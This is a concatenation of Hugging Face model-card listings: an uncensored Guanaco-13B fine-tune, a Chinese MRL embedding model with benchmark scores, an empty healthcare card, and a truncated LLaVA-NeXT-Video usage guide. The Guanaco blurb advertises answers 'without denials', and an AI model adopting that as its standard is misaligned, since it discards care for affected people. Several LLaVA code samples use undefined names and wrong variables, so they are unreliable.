Guanaco-13B-Uncensored has been fine-tuned for 4 epochs on the [Unfiltered Guanaco Dataset.](https://huggingface.co/datasets/Fredithefish/openassistant-guanaco-unfiltered) using [Llama-2-13B](https://hf.co/meta-llama/Llama-2-13b-hf) as the base model.
<br>The model does not perform well with languages other than English.
<br>Please note: This model is designed to provide responses without content filtering or censorship. It generates answers without denials.
## Special thanks
I would like to thank AutoMeta for providing me with the computing power necessary to train this model.
Also thanks to TheBloke for creating [the GGUF](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF) and [the GPTQ](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GPTQ) quantizations for this model
### Prompt Template
```
### Human: {prompt} ### Assistant:
```
### Dataset
The model has been fine-tuned on the V2 of the Guanaco unfiltered dataset.
<!-- original-model-card end -->
|
infgrad/stella-mrl-large-zh-v3.5-1792d | infgrad | "2024-06-13T04:44:44Z" | 3,589 | 39 | sentence-transformers | [
"sentence-transformers",
"pytorch",
"bert",
"feature-extraction",
"sentence-similarity",
"mteb",
"arxiv:2205.13147",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | sentence-similarity | "2024-02-27T09:48:21Z" | ---
pipeline_tag: sentence-similarity
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- mteb
model-index:
- name: stella-mrl-large-zh-v3.5-1792d
results:
- task:
type: STS
dataset:
type: C-MTEB/AFQMC
name: MTEB AFQMC
config: default
split: validation
revision: None
metrics:
- type: cos_sim_pearson
value: 54.33822814973567
- type: cos_sim_spearman
value: 58.85457316132848
- type: euclidean_pearson
value: 57.57048145477383
- type: euclidean_spearman
value: 58.854593263425095
- type: manhattan_pearson
value: 57.55884028558309
- type: manhattan_spearman
value: 58.84474216217465
- task:
type: STS
dataset:
type: C-MTEB/ATEC
name: MTEB ATEC
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 54.219652875381875
- type: cos_sim_spearman
value: 58.079506691583546
- type: euclidean_pearson
value: 61.646366330471736
- type: euclidean_spearman
value: 58.07951006894859
- type: manhattan_pearson
value: 61.64460832085762
- type: manhattan_spearman
value: 58.08054699349972
- task:
type: Classification
dataset:
type: mteb/amazon_reviews_multi
name: MTEB AmazonReviewsClassification (zh)
config: zh
split: test
revision: 1399c76144fd37290681b995c656ef9b2e06e26d
metrics:
- type: accuracy
value: 46.593999999999994
- type: f1
value: 44.73150848183217
- task:
type: STS
dataset:
type: C-MTEB/BQ
name: MTEB BQ
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 69.16841007040091
- type: cos_sim_spearman
value: 71.04760904227217
- type: euclidean_pearson
value: 69.95126084376611
- type: euclidean_spearman
value: 71.04760904184589
- type: manhattan_pearson
value: 69.92512024129407
- type: manhattan_spearman
value: 71.02613161257672
- task:
type: Clustering
dataset:
type: C-MTEB/CLSClusteringP2P
name: MTEB CLSClusteringP2P
config: default
split: test
revision: None
metrics:
- type: v_measure
value: 43.032332399653306
- task:
type: Clustering
dataset:
type: C-MTEB/CLSClusteringS2S
name: MTEB CLSClusteringS2S
config: default
split: test
revision: None
metrics:
- type: v_measure
value: 40.41603958793544
- task:
type: Reranking
dataset:
type: C-MTEB/CMedQAv1-reranking
name: MTEB CMedQAv1
config: default
split: test
revision: None
metrics:
- type: map
value: 89.33487924447584
- type: mrr
value: 91.34623015873017
- task:
type: Reranking
dataset:
type: C-MTEB/CMedQAv2-reranking
name: MTEB CMedQAv2
config: default
split: test
revision: None
metrics:
- type: map
value: 89.17795270698021
- type: mrr
value: 91.0956746031746
- task:
type: Retrieval
dataset:
type: C-MTEB/CmedqaRetrieval
name: MTEB CmedqaRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 26.809
- type: map_at_10
value: 39.906000000000006
- type: map_at_100
value: 41.858000000000004
- type: map_at_1000
value: 41.954
- type: map_at_3
value: 35.435
- type: map_at_5
value: 37.978
- type: mrr_at_1
value: 40.660000000000004
- type: mrr_at_10
value: 48.787000000000006
- type: mrr_at_100
value: 49.796
- type: mrr_at_1000
value: 49.832
- type: mrr_at_3
value: 46.166000000000004
- type: mrr_at_5
value: 47.675
- type: ndcg_at_1
value: 40.660000000000004
- type: ndcg_at_10
value: 46.614
- type: ndcg_at_100
value: 54.037
- type: ndcg_at_1000
value: 55.654
- type: ndcg_at_3
value: 41.032000000000004
- type: ndcg_at_5
value: 43.464999999999996
- type: precision_at_1
value: 40.660000000000004
- type: precision_at_10
value: 10.35
- type: precision_at_100
value: 1.6340000000000001
- type: precision_at_1000
value: 0.184
- type: precision_at_3
value: 23.122
- type: precision_at_5
value: 16.944
- type: recall_at_1
value: 26.809
- type: recall_at_10
value: 57.474000000000004
- type: recall_at_100
value: 87.976
- type: recall_at_1000
value: 98.74199999999999
- type: recall_at_3
value: 40.819
- type: recall_at_5
value: 48.175000000000004
- task:
type: PairClassification
dataset:
type: C-MTEB/CMNLI
name: MTEB Cmnli
config: default
split: validation
revision: None
metrics:
- type: cos_sim_accuracy
value: 83.4996993385448
- type: cos_sim_ap
value: 90.66238348446467
- type: cos_sim_f1
value: 84.39077936333699
- type: cos_sim_precision
value: 79.53651975998345
- type: cos_sim_recall
value: 89.87608136544307
- type: dot_accuracy
value: 83.4996993385448
- type: dot_ap
value: 90.64660919236363
- type: dot_f1
value: 84.39077936333699
- type: dot_precision
value: 79.53651975998345
- type: dot_recall
value: 89.87608136544307
- type: euclidean_accuracy
value: 83.4996993385448
- type: euclidean_ap
value: 90.66238269557765
- type: euclidean_f1
value: 84.39077936333699
- type: euclidean_precision
value: 79.53651975998345
- type: euclidean_recall
value: 89.87608136544307
- type: manhattan_accuracy
value: 83.35538184004811
- type: manhattan_ap
value: 90.6446013420276
- type: manhattan_f1
value: 84.37465196569775
- type: manhattan_precision
value: 80.5614632071459
- type: manhattan_recall
value: 88.56675239653963
- type: max_accuracy
value: 83.4996993385448
- type: max_ap
value: 90.66238348446467
- type: max_f1
value: 84.39077936333699
- task:
type: Retrieval
dataset:
type: C-MTEB/CovidRetrieval
name: MTEB CovidRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 68.967
- type: map_at_10
value: 77.95299999999999
- type: map_at_100
value: 78.213
- type: map_at_1000
value: 78.21900000000001
- type: map_at_3
value: 76.30799999999999
- type: map_at_5
value: 77.316
- type: mrr_at_1
value: 69.125
- type: mrr_at_10
value: 77.886
- type: mrr_at_100
value: 78.141
- type: mrr_at_1000
value: 78.147
- type: mrr_at_3
value: 76.291
- type: mrr_at_5
value: 77.29700000000001
- type: ndcg_at_1
value: 69.231
- type: ndcg_at_10
value: 81.867
- type: ndcg_at_100
value: 82.982
- type: ndcg_at_1000
value: 83.12
- type: ndcg_at_3
value: 78.592
- type: ndcg_at_5
value: 80.39
- type: precision_at_1
value: 69.231
- type: precision_at_10
value: 9.494
- type: precision_at_100
value: 0.9990000000000001
- type: precision_at_1000
value: 0.101
- type: precision_at_3
value: 28.591
- type: precision_at_5
value: 18.061
- type: recall_at_1
value: 68.967
- type: recall_at_10
value: 93.941
- type: recall_at_100
value: 98.84100000000001
- type: recall_at_1000
value: 99.895
- type: recall_at_3
value: 85.142
- type: recall_at_5
value: 89.46300000000001
- task:
type: Retrieval
dataset:
type: C-MTEB/DuRetrieval
name: MTEB DuRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 25.824
- type: map_at_10
value: 79.396
- type: map_at_100
value: 82.253
- type: map_at_1000
value: 82.295
- type: map_at_3
value: 54.83
- type: map_at_5
value: 69.536
- type: mrr_at_1
value: 89.7
- type: mrr_at_10
value: 92.929
- type: mrr_at_100
value: 93.013
- type: mrr_at_1000
value: 93.015
- type: mrr_at_3
value: 92.658
- type: mrr_at_5
value: 92.841
- type: ndcg_at_1
value: 89.7
- type: ndcg_at_10
value: 86.797
- type: ndcg_at_100
value: 89.652
- type: ndcg_at_1000
value: 90.047
- type: ndcg_at_3
value: 85.651
- type: ndcg_at_5
value: 84.747
- type: precision_at_1
value: 89.7
- type: precision_at_10
value: 41.61
- type: precision_at_100
value: 4.788
- type: precision_at_1000
value: 0.488
- type: precision_at_3
value: 76.833
- type: precision_at_5
value: 65.14
- type: recall_at_1
value: 25.824
- type: recall_at_10
value: 87.896
- type: recall_at_100
value: 97.221
- type: recall_at_1000
value: 99.29599999999999
- type: recall_at_3
value: 57.178
- type: recall_at_5
value: 74.348
- task:
type: Retrieval
dataset:
type: C-MTEB/EcomRetrieval
name: MTEB EcomRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 52.5
- type: map_at_10
value: 63.04
- type: map_at_100
value: 63.548
- type: map_at_1000
value: 63.56
- type: map_at_3
value: 60.483
- type: map_at_5
value: 62.22800000000001
- type: mrr_at_1
value: 52.5
- type: mrr_at_10
value: 63.04
- type: mrr_at_100
value: 63.548
- type: mrr_at_1000
value: 63.56
- type: mrr_at_3
value: 60.483
- type: mrr_at_5
value: 62.22800000000001
- type: ndcg_at_1
value: 52.5
- type: ndcg_at_10
value: 68.099
- type: ndcg_at_100
value: 70.48400000000001
- type: ndcg_at_1000
value: 70.769
- type: ndcg_at_3
value: 63.01
- type: ndcg_at_5
value: 66.148
- type: precision_at_1
value: 52.5
- type: precision_at_10
value: 8.39
- type: precision_at_100
value: 0.9490000000000001
- type: precision_at_1000
value: 0.097
- type: precision_at_3
value: 23.433
- type: precision_at_5
value: 15.58
- type: recall_at_1
value: 52.5
- type: recall_at_10
value: 83.89999999999999
- type: recall_at_100
value: 94.89999999999999
- type: recall_at_1000
value: 97.1
- type: recall_at_3
value: 70.3
- type: recall_at_5
value: 77.9
- task:
type: Classification
dataset:
type: C-MTEB/IFlyTek-classification
name: MTEB IFlyTek
config: default
split: validation
revision: None
metrics:
- type: accuracy
value: 50.742593305117346
- type: f1
value: 38.7451988564002
- task:
type: Classification
dataset:
type: C-MTEB/JDReview-classification
name: MTEB JDReview
config: default
split: test
revision: None
metrics:
- type: accuracy
value: 86.09756097560977
- type: ap
value: 54.39255221143281
- type: f1
value: 80.8326851537251
- task:
type: STS
dataset:
type: C-MTEB/LCQMC
name: MTEB LCQMC
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 72.32408066246728
- type: cos_sim_spearman
value: 78.25773378380241
- type: euclidean_pearson
value: 77.87824677060661
- type: euclidean_spearman
value: 78.25773599854358
- type: manhattan_pearson
value: 77.86648277798515
- type: manhattan_spearman
value: 78.24642917155661
- task:
type: Reranking
dataset:
type: C-MTEB/Mmarco-reranking
name: MTEB MMarcoReranking
config: default
split: dev
revision: None
metrics:
- type: map
value: 28.846601097874608
- type: mrr
value: 27.902777777777775
- task:
type: Retrieval
dataset:
type: C-MTEB/MMarcoRetrieval
name: MTEB MMarcoRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 66.533
- type: map_at_10
value: 75.58399999999999
- type: map_at_100
value: 75.91
- type: map_at_1000
value: 75.921
- type: map_at_3
value: 73.847
- type: map_at_5
value: 74.929
- type: mrr_at_1
value: 68.854
- type: mrr_at_10
value: 76.20700000000001
- type: mrr_at_100
value: 76.498
- type: mrr_at_1000
value: 76.508
- type: mrr_at_3
value: 74.71600000000001
- type: mrr_at_5
value: 75.653
- type: ndcg_at_1
value: 68.854
- type: ndcg_at_10
value: 79.209
- type: ndcg_at_100
value: 80.67
- type: ndcg_at_1000
value: 80.95
- type: ndcg_at_3
value: 75.923
- type: ndcg_at_5
value: 77.74799999999999
- type: precision_at_1
value: 68.854
- type: precision_at_10
value: 9.547
- type: precision_at_100
value: 1.027
- type: precision_at_1000
value: 0.105
- type: precision_at_3
value: 28.582
- type: precision_at_5
value: 18.112000000000002
- type: recall_at_1
value: 66.533
- type: recall_at_10
value: 89.736
- type: recall_at_100
value: 96.34
- type: recall_at_1000
value: 98.52
- type: recall_at_3
value: 81.047
- type: recall_at_5
value: 85.38900000000001
- task:
type: Classification
dataset:
type: mteb/amazon_massive_intent
name: MTEB MassiveIntentClassification (zh-CN)
config: zh-CN
split: test
revision: 31efe3c427b0bae9c22cbb560b8f15491cc6bed7
metrics:
- type: accuracy
value: 73.27841291190316
- type: f1
value: 70.82287701665152
- task:
type: Classification
dataset:
type: mteb/amazon_massive_scenario
name: MTEB MassiveScenarioClassification (zh-CN)
config: zh-CN
split: test
revision: 7d571f92784cd94a019292a1f45445077d0ef634
metrics:
- type: accuracy
value: 76.20040349697376
- type: f1
value: 75.92782428878164
- task:
type: Retrieval
dataset:
type: C-MTEB/MedicalRetrieval
name: MTEB MedicalRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 56.39999999999999
- type: map_at_10
value: 62.122
- type: map_at_100
value: 62.692
- type: map_at_1000
value: 62.739
- type: map_at_3
value: 60.617
- type: map_at_5
value: 61.582
- type: mrr_at_1
value: 56.39999999999999
- type: mrr_at_10
value: 62.125
- type: mrr_at_100
value: 62.696
- type: mrr_at_1000
value: 62.742
- type: mrr_at_3
value: 60.617
- type: mrr_at_5
value: 61.602000000000004
- type: ndcg_at_1
value: 56.39999999999999
- type: ndcg_at_10
value: 64.986
- type: ndcg_at_100
value: 67.889
- type: ndcg_at_1000
value: 69.16499999999999
- type: ndcg_at_3
value: 61.951
- type: ndcg_at_5
value: 63.685
- type: precision_at_1
value: 56.39999999999999
- type: precision_at_10
value: 7.3999999999999995
- type: precision_at_100
value: 0.8789999999999999
- type: precision_at_1000
value: 0.098
- type: precision_at_3
value: 21.933
- type: precision_at_5
value: 14.000000000000002
- type: recall_at_1
value: 56.39999999999999
- type: recall_at_10
value: 74
- type: recall_at_100
value: 87.9
- type: recall_at_1000
value: 98
- type: recall_at_3
value: 65.8
- type: recall_at_5
value: 70
- task:
type: Classification
dataset:
type: C-MTEB/MultilingualSentiment-classification
name: MTEB MultilingualSentiment
config: default
split: validation
revision: None
metrics:
- type: accuracy
value: 76.64
- type: f1
value: 76.5446299028248
- task:
type: PairClassification
dataset:
type: C-MTEB/OCNLI
name: MTEB Ocnli
config: default
split: validation
revision: None
metrics:
- type: cos_sim_accuracy
value: 82.34975636166757
- type: cos_sim_ap
value: 85.51352392694149
- type: cos_sim_f1
value: 83.53057199211045
- type: cos_sim_precision
value: 78.35337650323775
- type: cos_sim_recall
value: 89.44033790918691
- type: dot_accuracy
value: 82.34975636166757
- type: dot_ap
value: 85.51347115601486
- type: dot_f1
value: 83.53057199211045
- type: dot_precision
value: 78.35337650323775
- type: dot_recall
value: 89.44033790918691
- type: euclidean_accuracy
value: 82.34975636166757
- type: euclidean_ap
value: 85.51352392694149
- type: euclidean_f1
value: 83.53057199211045
- type: euclidean_precision
value: 78.35337650323775
- type: euclidean_recall
value: 89.44033790918691
- type: manhattan_accuracy
value: 82.34975636166757
- type: manhattan_ap
value: 85.48313896880585
- type: manhattan_f1
value: 83.52414136386261
- type: manhattan_precision
value: 79.00188323917138
- type: manhattan_recall
value: 88.59556494192185
- type: max_accuracy
value: 82.34975636166757
- type: max_ap
value: 85.51352392694149
- type: max_f1
value: 83.53057199211045
- task:
type: Classification
dataset:
type: C-MTEB/OnlineShopping-classification
name: MTEB OnlineShopping
config: default
split: test
revision: None
metrics:
- type: accuracy
value: 93.39
- type: ap
value: 91.62127505252761
- type: f1
value: 93.38126146765326
- task:
type: STS
dataset:
type: C-MTEB/PAWSX
name: MTEB PAWSX
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 39.69424895486595
- type: cos_sim_spearman
value: 45.357868735202885
- type: euclidean_pearson
value: 44.85027304963503
- type: euclidean_spearman
value: 45.356945176162064
- type: manhattan_pearson
value: 44.866080721344744
- type: manhattan_spearman
value: 45.37053172312661
- task:
type: STS
dataset:
type: C-MTEB/QBQTC
name: MTEB QBQTC
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 37.03908089465844
- type: cos_sim_spearman
value: 38.98314179826781
- type: euclidean_pearson
value: 37.189386019789545
- type: euclidean_spearman
value: 38.98311189555396
- type: manhattan_pearson
value: 37.14695118899785
- type: manhattan_spearman
value: 38.94957261261034
- task:
type: STS
dataset:
type: mteb/sts22-crosslingual-sts
name: MTEB STS22 (zh)
config: zh
split: test
revision: 6d1ba47164174a496b7fa5d3569dae26a6813b80
metrics:
- type: cos_sim_pearson
value: 65.08396305098712
- type: cos_sim_spearman
value: 66.26346934994216
- type: euclidean_pearson
value: 65.56501615370941
- type: euclidean_spearman
value: 66.26346934994216
- type: manhattan_pearson
value: 65.47984748172154
- type: manhattan_spearman
value: 66.25326746119808
- task:
type: STS
dataset:
type: C-MTEB/STSB
name: MTEB STSB
config: default
split: test
revision: None
metrics:
- type: cos_sim_pearson
value: 80.95965207330296
- type: cos_sim_spearman
value: 82.96149593569953
- type: euclidean_pearson
value: 82.67125448003975
- type: euclidean_spearman
value: 82.96141174550262
- type: manhattan_pearson
value: 82.64660468206361
- type: manhattan_spearman
value: 82.91756025324656
- task:
type: Reranking
dataset:
type: C-MTEB/T2Reranking
name: MTEB T2Reranking
config: default
split: dev
revision: None
metrics:
- type: map
value: 66.43391960680063
- type: mrr
value: 76.078440855015
- task:
type: Retrieval
dataset:
type: C-MTEB/T2Retrieval
name: MTEB T2Retrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 28.29
- type: map_at_10
value: 78.441
- type: map_at_100
value: 82.043
- type: map_at_1000
value: 82.10499999999999
- type: map_at_3
value: 55.448
- type: map_at_5
value: 67.982
- type: mrr_at_1
value: 91.18
- type: mrr_at_10
value: 93.498
- type: mrr_at_100
value: 93.57
- type: mrr_at_1000
value: 93.572
- type: mrr_at_3
value: 93.112
- type: mrr_at_5
value: 93.351
- type: ndcg_at_1
value: 91.18
- type: ndcg_at_10
value: 85.849
- type: ndcg_at_100
value: 89.32600000000001
- type: ndcg_at_1000
value: 89.9
- type: ndcg_at_3
value: 87.333
- type: ndcg_at_5
value: 85.91499999999999
- type: precision_at_1
value: 91.18
- type: precision_at_10
value: 42.315000000000005
- type: precision_at_100
value: 5.029
- type: precision_at_1000
value: 0.517
- type: precision_at_3
value: 76.12400000000001
- type: precision_at_5
value: 63.690000000000005
- type: recall_at_1
value: 28.29
- type: recall_at_10
value: 84.679
- type: recall_at_100
value: 95.952
- type: recall_at_1000
value: 98.821
- type: recall_at_3
value: 56.987
- type: recall_at_5
value: 71.15599999999999
- task:
type: Classification
dataset:
type: C-MTEB/TNews-classification
name: MTEB TNews
config: default
split: validation
revision: None
metrics:
- type: accuracy
value: 53.09799999999999
- type: f1
value: 51.397192036892314
- task:
type: Clustering
dataset:
type: C-MTEB/ThuNewsClusteringP2P
name: MTEB ThuNewsClusteringP2P
config: default
split: test
revision: None
metrics:
- type: v_measure
value: 70.59693805158501
- task:
type: Clustering
dataset:
type: C-MTEB/ThuNewsClusteringS2S
name: MTEB ThuNewsClusteringS2S
config: default
split: test
revision: None
metrics:
- type: v_measure
value: 63.21127290121542
- task:
type: Retrieval
dataset:
type: C-MTEB/VideoRetrieval
name: MTEB VideoRetrieval
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 61.3
- type: map_at_10
value: 70.658
- type: map_at_100
value: 71.096
- type: map_at_1000
value: 71.108
- type: map_at_3
value: 69.15
- type: map_at_5
value: 70.125
- type: mrr_at_1
value: 61.3
- type: mrr_at_10
value: 70.658
- type: mrr_at_100
value: 71.096
- type: mrr_at_1000
value: 71.108
- type: mrr_at_3
value: 69.15
- type: mrr_at_5
value: 70.125
- type: ndcg_at_1
value: 61.3
- type: ndcg_at_10
value: 74.71
- type: ndcg_at_100
value: 76.783
- type: ndcg_at_1000
value: 77.09899999999999
- type: ndcg_at_3
value: 71.634
- type: ndcg_at_5
value: 73.399
- type: precision_at_1
value: 61.3
- type: precision_at_10
value: 8.72
- type: precision_at_100
value: 0.967
- type: precision_at_1000
value: 0.099
- type: precision_at_3
value: 26.267000000000003
- type: precision_at_5
value: 16.619999999999997
- type: recall_at_1
value: 61.3
- type: recall_at_10
value: 87.2
- type: recall_at_100
value: 96.7
- type: recall_at_1000
value: 99.2
- type: recall_at_3
value: 78.8
- type: recall_at_5
value: 83.1
- task:
type: Classification
dataset:
type: C-MTEB/waimai-classification
name: MTEB Waimai
config: default
split: test
revision: None
metrics:
- type: accuracy
value: 88.01
- type: ap
value: 72.51537272974005
- type: f1
value: 86.49546025793478
license: mit
---
**新闻 | News**
**[2024-04-06]** 开源[puff](https://huggingface.co/infgrad/puff-base-v1)系列模型,**专门针对检索和语义匹配任务,更多的考虑泛化性和私有通用测试集效果,向量维度可变,中英双语**。
**[2024-02-27]** 开源stella-mrl-large-zh-v3.5-1792d模型,支持**向量可变维度**。
**[2024-02-17]** 开源stella v3系列、dialogue编码模型和相关训练数据。
**[2023-10-19]** 开源stella-base-en-v2 使用简单,**不需要任何前缀文本**。
**[2023-10-12]** 开源stella-base-zh-v2和stella-large-zh-v2, 效果更好且使用简单,**不需要任何前缀文本**。
**[2023-09-11]** 开源stella-base-zh和stella-large-zh
欢迎去[本人主页](https://huggingface.co/infgrad)查看最新模型,并提出您的宝贵意见!
# 1 开源模型
本次开源stella-mrl-large-zh-v3.5-1792d模型,
本模型是在stella-large-zh-v3-1792d的基础上使用[MRL](https://arxiv.org/abs/2205.13147)方法训练而成。
其主要特点是**可变的向量维度**。
# 2 使用方法
```python
from sentence_transformers import SentenceTransformer
from sklearn.preprocessing import normalize
model = SentenceTransformer("infgrad/stella-mrl-large-zh-v3.5-1792d")
# 注意先不要normalize! 选取前n维后再normalize
vectors = model.encode(["text1", "text2"], normalize_embeddings=False)
print(vectors.shape) # shape is [2,1792]
# n_dims越大效果越好,但是时空消耗就越大。建议维度选取128的倍数,因为是这么训练的
n_dims = 768
cut_vecs = normalize(vectors[:, :n_dims])
```
# 3 不同向量维度的CMTEB得分
stella-mrl-large-zh-v3.5-1792d_1024 代表取前1024维。整体趋势是维度越大效果越好。
| Model | Retrieval | STS | PairClassification | Classification | Reranking | Clustering | CMTEB-Score |
|:------------------------------------|:---------:|:-----:|:------------------:|:--------------:|:---------:|:----------:|:-----------:|
| stella-mrl-large-zh-v3.5-1792d_128 | 70.01 | 62.17 | 87.99 | 70.67 | 66.77 | 53.55 | 67.16 |
| stella-mrl-large-zh-v3.5-1792d_256 | 72.19 | 62.41 | 88.09 | 71.22 | 68.32 | 53.38 | 68.02 |
| stella-mrl-large-zh-v3.5-1792d_384 | 72.77 | 62.43 | 88.26 | 71.34 | 68.31 | 53.87 | 68.25 |
| stella-mrl-large-zh-v3.5-1792d_512 | 73.11 | 62.45 | 88.16 | 71.46 | 68.32 | 53.28 | 68.29 |
| stella-mrl-large-zh-v3.5-1792d_640 | 73.27 | 62.49 | 88.21 | 71.46 | 68.69 | 53.63 | 68.42 |
| stella-mrl-large-zh-v3.5-1792d_768 | 73.38 | 62.5 | 88.19 | 71.49 | 68.64 | 53.77 | 68.47 |
| stella-mrl-large-zh-v3.5-1792d_896 | 73.37 | 62.5 | 88.14 | 71.51 | 68.44 | 54.13 | 68.49 |
| stella-mrl-large-zh-v3.5-1792d_1024 | 73.43 | 62.51 | 88.16 | 71.52 | 68.59 | 53.43 | 68.44 |
| stella-mrl-large-zh-v3.5-1792d_1152 | 73.46 | 62.49 | 88.16 | 71.57 | 68.55 | 53.67 | 68.49 |
| stella-mrl-large-zh-v3.5-1792d_1280 | 73.48 | 62.51 | 88.12 | 71.55 | 68.44 | 53.74 | 68.48 |
| stella-mrl-large-zh-v3.5-1792d_1408 | 73.48 | 62.51 | 88.14 | 71.58 | 68.46 | 53.69 | 68.48 |
| stella-mrl-large-zh-v3.5-1792d_1536 | 73.49 | 62.5 | 88.11 | 71.55 | 68.5 | 54.06 | 68.52 |
| stella-mrl-large-zh-v3.5-1792d_1664 | 73.56 | 62.49 | 88.06 | 71.56 | 68.47 | 54.28 | 68.56 |
| stella-mrl-large-zh-v3.5-1792d_1792 | 73.51 | 62.48 | 88.09 | 71.56 | 68.45 | 54.39 | 68.56 |
上述表格中stella-mrl-large-zh-v3.5-1792d_1792的得分为68.56和榜单68.55得分不一致,原因和权重类型有关,小差异请忽略不计。 |
anhduy0911/LLM-IE-Healthcare | anhduy0911 | "2024-07-02T06:33:01Z" | 3,585 | 0 | transformers | [
"transformers",
"llama",
"text-generation",
"license:llama3",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"4-bit",
"gptq",
"region:us"
] | text-generation | "2024-07-02T03:01:18Z" | ---
license: llama3
---
|
llava-hf/LLaVA-NeXT-Video-7B-hf | llava-hf | "2024-06-17T07:52:37Z" | 3,584 | 7 | transformers | [
"transformers",
"safetensors",
"llava_next",
"pretraining",
"image-text-to-text",
"en",
"dataset:lmms-lab/VideoChatGPT",
"arxiv:2405.21075",
"license:llama2",
"endpoints_compatible",
"region:us"
] | image-text-to-text | "2024-06-05T13:28:32Z" | ---
language:
- en
license: llama2
pipeline_tag: image-text-to-text
datasets:
- lmms-lab/VideoChatGPT
---
# LLaVA-NeXT-Video Model Card
Check out also the Google Colab demo to run Llava on a free-tier Google Colab instance: [](https://colab.research.google.com/drive/1CZggLHrjxMReG-FNOmqSOdi4z7NPq6SO?usp=sharing)
Disclaimer: The team releasing LLaVa-NeXT-Video did not write a model card for this model so this model card has been written by the Hugging Face team.
## 📄 Model details
**Model type:**
LLaVA-Next-Video is an open-source chatbot trained by fine-tuning LLM on multimodal instruction-following data. The model is buit on top of LLaVa-NeXT by tuning on a mix of video and image data to achieves better video understanding capabilities. The videos were sampled uniformly to be 32 frames per clip.
The model is a current SOTA among open-source models on [VideoMME bench](https://arxiv.org/abs/2405.21075).
Base LLM: [lmsys/vicuna-7b-v1.5](https://huggingface.co/lmsys/vicuna-13b-v1.5)

**Model date:**
LLaVA-Next-Video-7B was trained in April 2024.
**Paper or resources for more information:** https://github.com/LLaVA-VL/LLaVA-NeXT
## 📚 Training dataset
### Image
- 558K filtered image-text pairs from LAION/CC/SBU, captioned by BLIP.
- 158K GPT-generated multimodal instruction-following data.
- 500K academic-task-oriented VQA data mixture.
- 50K GPT-4V data mixture.
- 40K ShareGPT data.
### Video
- 100K VideoChatGPT-Instruct.
## 📊 Evaluation dataset
A collection of 4 benchmarks, including 3 academic VQA benchmarks and 1 captioning benchmark.
## 🚀 How to use the model
First, make sure to have `transformers >= 4.42.0`.
The model supports multi-visual and multi-prompt generation. Meaning that you can pass multiple images/videos in your prompt. Make sure also to follow the correct prompt template (`USER: xxx\nASSISTANT:`) and add the token `<image>` or `<video>` to the location where you want to query images/videos:
Below is an example script to run generation in `float16` precision on a GPU device:
```python
import av
import torch
from transformers import LlavaNextVideoProcessor, LlavaNextVideoForConditionalGeneration
model_id = "llava-hf/LLaVA-NeXT-Video-7B-hf"
model = LlavaNextVideoForConditionalGeneration.from_pretrained(
model_id,
torch_dtype=torch.float16,
low_cpu_mem_usage=True,
).to(0)
processor = LlavaNextVideoProcessor.from_pretrained(model_id)
def read_video_pyav(container, indices):
'''
Decode the video with PyAV decoder.
Args:
container (`av.container.input.InputContainer`): PyAV container.
indices (`List[int]`): List of frame indices to decode.
Returns:
result (np.ndarray): np array of decoded frames of shape (num_frames, height, width, 3).
'''
frames = []
container.seek(0)
start_index = indices[0]
end_index = indices[-1]
for i, frame in enumerate(container.decode(video=0)):
if i > end_index:
break
if i >= start_index and i in indices:
frames.append(frame)
return np.stack([x.to_ndarray(format="rgb24") for x in frames])
# define a chat histiry and use `apply_chat_template` to get correctly formatted prompt
# Each value in "content" has to be a list of dicts with types ("text", "image", "video")
conversation = [
{
"role": "user",
"content": [
{"type": "text", "text": "Why is this video funny?"},
{"type": "video"},
],
},
]
prompt = processor.apply_chat_template(conversation, add_generation_prompt=True)
video_path = hf_hub_download(repo_id="raushan-testing-hf/videos-test", filename="sample_demo_1.mp4", repo_type="dataset")
container = av.open(video_path)
# sample uniformly 8 frames from the video, can sample more for longer videos
total_frames = container.streams.video[0].frames
indices = np.arange(0, total_frames, total_frames / 8).astype(int)
clip = read_video_pyav(container, indices)
inputs_video = processor(text=prompt, videos=clip, padding=True, return_tensors="pt").to(model.device)
output = model.generate(**inputs_video, max_new_tokens=100, do_sample=False)
print(processor.decode(output[0][2:], skip_special_tokens=True))
```
### Inference with images as inputs
To generate from images use the below code after loading the model as shown above:
```python
import requests
from PIL import Image
conversation = [
{
"role": "user",
"content": [
{"type": "text", "text": "What are these?"},
{"type": "image"},
],
},
]
prompt = processor.apply_chat_template(conversation, add_generation_prompt=True)
image_file = "http://images.cocodataset.org/val2017/000000039769.jpg"
raw_image = Image.open(requests.get(image_file, stream=True).raw)
inputs_image = processor(prompt, images=raw_image, return_tensors='pt').to(0, torch.float16)
output = model.generate(**inputs_video, max_new_tokens=100, do_sample=False)
print(processor.decode(output[0][2:], skip_special_tokens=True))
```
### Inference with images and videos as inputs
To generate from images and videos in one generate use the below code after loading the model as shown above:
```python
conversation_1 = [
{
"role": "user",
"content": [
{"type": "text", "text": "What's the content of the image>"},
{"type": "image"},
],
}
]
conversation_2 = [
{
"role": "user",
"content": [
{"type": "text", "text": "Why is this video funny?"},
{"type": "video"},
],
},
]
prompt_1 = processor.apply_chat_template(conversation_1, add_generation_prompt=True)
prompt_2 = processor.apply_chat_template(conversation_2, add_generation_prompt=True)
s = processor(text=[prompt_1, prompt_2], images=image, videos=clip, padding=True, return_tensors="pt").to(model.device)
# Generate
generate_ids = model.generate(**inputs, max_new_tokens=100)
out = processor.batch_decode(generate_ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)
print(out)
```
### Model optimization
#### 4-bit quantization through `bitsandbytes` library
First make sure to install `bitsandbytes`, `pip install bitsandbytes` and make sure to have access to a CUDA compatible GPU device. Simply change the snippet above with:
```diff
